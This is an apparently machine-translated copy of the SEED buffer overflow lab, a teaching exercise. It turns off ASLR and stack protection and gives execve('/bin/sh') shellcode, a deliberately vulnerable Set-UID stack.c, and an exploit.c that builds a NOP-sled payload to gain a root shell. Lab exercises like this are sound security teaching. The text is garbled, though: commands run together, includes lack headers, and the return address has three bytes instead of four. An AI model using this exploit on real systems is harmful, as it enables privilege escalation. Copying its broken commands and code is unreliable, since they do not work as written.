SEED experiment: Buffer Overflow Vulnerability Experiment

SEED experiment: Buffer Overflow Vulnerability Experiment

1. Experiment description

Buffer overflow refers to the situation where a program attempts to write data beyond the pre-allocated fixed length to the buffer. This vulnerability can be exploited by malicious users to change program traffic control and even execute arbitrary code fragments. This vulnerability occurs because the data buffer and return address are temporarily closed. Overflow may cause the return address to be overwritten.

2. Test preparation

System username shiyanlou, password shiyanlou

The experiment building provides 64-bit Ubuntu linux. In this experiment, we need to perform operations in a 32-bit environment to facilitate observation of Assembly statements. Therefore, we need to make some preparations before the experiment.

1. Enter a command to install something for compiling a 32-bit C program:

sudo apt-get updatesudo apt-get install lib32z1 libc6-dev-i386sudo apt-get install lib32readline-gplv2-dev

2. Enter the command "linux32" to enter the 32-bit linux environment. At this point, you will find that the command line is not so easy to use. For example, you cannot complete the tab, So enter "/bin/bash" to use bash:


Iii. Experiment steps

3.1 initial settings

In Ubuntu and other Linux systems, address spaces are randomly used to random heap and stack initial addresses, which makes it very difficult to guess the accurate memory address, guessing the memory address is the key to the buffer overflow attack. Therefore, in this experiment, we use the following command to disable this function:
Sudo sysctl-w kernel. randomize_va_space = 0

In addition, many shell programs automatically give up their privileges when called to further prevent buffer overflow attacks and other attacks using shell programs. Therefore, even if you can trick a Set-UID program into calling a shell, you cannot keep the root permission in this shell. This protection is implemented in/bin/bash.

In linux,/bin/sh is actually a symbolic link pointing to/bin/bash or/bin/dash. To reproduce the situation where this protection was previously implemented, we used another shell program (zsh) instead of/bin/bash. The following command describes how to set the zsh program:

sudo sucd /binrm shln -s zsh shexit

3.2 shellcode

Generally, a buffer overflow will cause the program to crash. in the program, the overflow data overwrites the return address. If the data that overwrites the returned address is another address, the program will jump to this address. If the address stores a piece of well-designed code for other functions, this code is shellcode.

Observe the following code:

#includeint main( ) {char *name[2];name[0] = ‘‘/bin/sh’’;name[1] = NULL;execve(name[0], name, NULL);}

The shellcode of this experiment is the assembly version of the code just now:
\ X31 \ xc0 \ x50 \ x68 "// sh" \ x68 "/bin" \ x89 \ xe3 \ x50 \ x53 \ x89 \ xe1 \ x99 \ xb0 \ x0b \ xcd \ x80

3.4 vulnerability programs

Save the following code as the "stack. c" file and save it to the/tmp directory. The Code is as follows:

/* stack.c *//* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */#include#include#includeint bof(char *str){char buffer[12];/* The following statement has a buffer overflow problem */strcpy(buffer, str);return 1;}int main(int argc, char **argv){char str[517];FILE *badfile;badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);printf("Returned Properly\n");return 1;}

The Code shows that the program reads a file named "badfile" and loads the file content into "buffer ".

Compile the program and SET the SET-UID. The command is as follows:

sudo sugcc -m32 -g -z execstack -fno-stack-protector -o stack stack.cchmod u+s stackexit

The GCC compiler has a stack protection mechanism to prevent buffer overflow, so we need to disable this mechanism with-fno-stack-protector when compiling code.

-Z execstack is used to allow execution of stacks.

3.5 attack programs

We aim to attack the vulnerability program and obtain the root permission through the attack.

Save the following code as the "exploit. c" file and save it to the/tmp directory. The Code is as follows:

/* exploit.c *//* A program that creates a file containing code for launching shell*/#include#include#includechar shellcode[]="\x31\xc0"    //xorl %eax,%eax"\x50"        //pushl %eax"\x68""//sh"  //pushl $0x68732f2f"\x68""/bin"  //pushl $0x6e69622f"\x89\xe3"    //movl %esp,%ebx"\x50"        //pushl %eax"\x53"        //pushl %ebx"\x89\xe1"    //movl %esp,%ecx"\x99"        //cdq"\xb0\x0b"    //movb $0x0b,%al"\xcd\x80"    //int $0x80;void main(int argc, char **argv){char buffer[517];FILE *badfile;/* Initialize buffer with 0x90 (NOP instruction) */memset(&buffer, 0x90, 517);/* You need to fill the buffer with appropriate contents here */strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");strcpy(buffer+100,shellcode);/* Save the contents to the file "badfile" */badfile = fopen("./badfile", "w");fwrite(buffer, 517, 1, badfile);fclose(badfile);}

Pay attention to the above Code, "\ x ?? \ X ?? \ X ?? \ X ??" The shellcode address stored in the memory needs to be added, because after overflow, this location can overwrite the return address.

Strcpy (buffer + 100, shellcode); this statement tells us that shellcode is stored at the position of buffer + 100.

To get the address of shellcode in the memory, enter the following command:
Gdb stack
Disass main

Result


Next:



According to the statement strcpy (buffer + 100, shellcode); we calculate the address of shellcode as 0xffffd1b0 (hexadecimal) + 100 (decimal) = 0xffffd214 (hexadecimal)

* Modify the exploit. c file now! \ X ?? \ X ?? \ X ?? \ X ?? Change to \ x14 \ xd2 \ xff *

Then, compile the exploit. c program:
Gcc-m32-o exploit. c

3.6 attack results

Run the attack program exploit first, and then run the vulnerability program stack. The following figure shows the result:



It can be seen that the root permission is obtained through attacks!

If the attack fails and a "segment error" is displayed, use gdb disassembly to calculate the memory address.

License

The lab involved in this course is from Syracuse SEED labs. On this basis, the environment for adapting to the lab building is modified. The modified lab Documentation still follows the GNU Free Documentation License.